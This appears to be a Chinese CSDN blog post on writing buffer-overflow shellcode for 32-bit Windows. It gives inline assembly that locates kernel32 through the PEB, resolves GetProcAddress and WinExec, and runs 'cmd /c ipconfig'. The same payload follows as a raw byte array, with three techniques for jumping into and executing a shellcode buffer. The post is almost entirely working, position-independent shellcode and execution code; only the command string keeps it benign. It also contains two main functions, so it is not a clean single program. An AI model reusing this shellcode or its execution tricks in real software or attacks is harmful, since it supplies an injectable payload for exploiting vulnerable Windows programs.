缓冲区溢出shellcode

void fun()
{
    __asm
    {
     mov eax, dword ptr fs:[0x30];
     mov eax, dword ptr [eax+0xC];
     mov eax, dword ptr [eax+0xC];
     mov eax, dword ptr [eax];
     mov eax, dword ptr [eax];
     mov eax, dword ptr [eax+0x18];
     mov ebp,eax                        //Kernel.dll基址
     mov eax,dword ptr ss:[ebp+3CH]      // eax=PE首部
     mov edx,dword ptr ds:[eax+ebp+78H]  //
     add edx,ebp                        // edx=引出表地址
     mov ecx,dword ptr ds:[edx+18H]      // ecx=导出函数个数，NumberOfFunctions
     mov ebx,dword ptr ds:[edx+20H]      //
     add ebx,ebp                        // ebx=函数名地址，AddressOfName
start:                                  //
     dec ecx                            // 循环的开始
     mov esi,dword ptr ds:[ebx+ecx*4]   //
     add esi,ebp                        //
     mov eax,0x50746547                   //
     cmp dword ptr ds:[esi],eax         // 比较PteG
     jnz start                     //
     mov eax,0x41636F72                   //
     cmp dword ptr ds:[esi+4],eax       // 比较Acor，通过GetProcA几个字符就能确定是GetProcAddress
     jnz start                     //
     mov ebx,dword ptr ds:[edx+24H]      //
     add ebx,ebp                        //
     mov cx,word ptr ds:[ebx+ecx*2]     //
     mov ebx,dword ptr ds:[edx+1CH]      //
     add ebx,ebp                        //
     mov eax,dword ptr ds:[ebx+ecx*4]   //
     add eax,ebp                        // eax 现在是GetProcAddress地址
     mov ebx,eax                        // GetProcAddress地址存入ebx，如果写ShellCode的话以后还可以继续调用
     push 0                             //
     push 0x636578                        //
     push 0x456E6957                      // 构造WinExec字符串
     push esp                           //
     push ebp                           // ebp是kernel32.dll的基址 
     call ebx                           // 用GetProcAdress得到WinExec地址
     mov ebx,eax                        // WinExec地址保存到ecx
 
     push 0x00676966
     push 0x6E6F6370
     push 0x6920632F
     push 0x20646d63    //cmd压入栈
 
     lea eax,[esp];     //取到cmd首地址
     push 1             //
     push eax           // ASCII "cmd /c ipconfig"
     call ebx           // 执行WinExec
    // leave            // 跳回原始入口点
    }
}

int main(int argc, char* argv[])
{
   fun();
}

int main(int argc, char* argv[])
{
unsigned char shellcode[]={
0x64,0xA1,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,0x00,0x8B,0x40,
0x18,0x8B,0xE8,0x36,0x8B,0x45,0x3C,0x3E,0x8B,0x54,0x28,0x78,0x03,0xD5,0x3E,0x8B,0x4A,0x18,
0x3E,0x8B,0x5A,0x20,0x03,0xDD,0x49,0x3E,0x8B,0x34,0x8B,0x03,0xF5,0xB8,0x47,0x65,0x74,0x50,
0x3E,0x39,0x06,0x75,0xEF,0xB8,0x72,0x6F,0x63,0x41,0x3E,0x39,0x46,0x04,0x75,0xE4,0x3E,0x8B,
0x5A,0x24,0x03,0xDD,0x66,0x3E,0x8B,0x0C,0x4B,0x3E,0x8B,0x5A,0x1C,0x03,0xDD,0x3E,0x8B,0x04,
0x8B,0x03,0xC5,0x8B,0xD8,0x6A,0x00,0x68,0x78,0x65,0x63,0x00,0x68,0x57,0x69,0x6E,0x45,0x54,
0x55,0xFF,0xD3,0x8B,0xD8,0x68,0x66,0x69,0x67,0x00,0x68,0x70,0x63,0x6F,0x6E,0x68,0x2F,0x63,
0x20,0x69,0x68,0x63,0x6D,0x64,0x20,0x8D,0x04,0x24,0x6A,0x01,0x50,0xFF,0xD3};
//三种方式执行shellcode
//第一种
((void (*)())&shellcode)(); // 执行shellcode
//第二种
__asm
{
lea eax,shellcode;
jmp eax;
}
//第三种
__asm
{
lea eax, shellcode
push eax
ret
}
}
————————————————
版权声明：本文为CSDN博主「maotoula」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/maotoula/article/details/18502679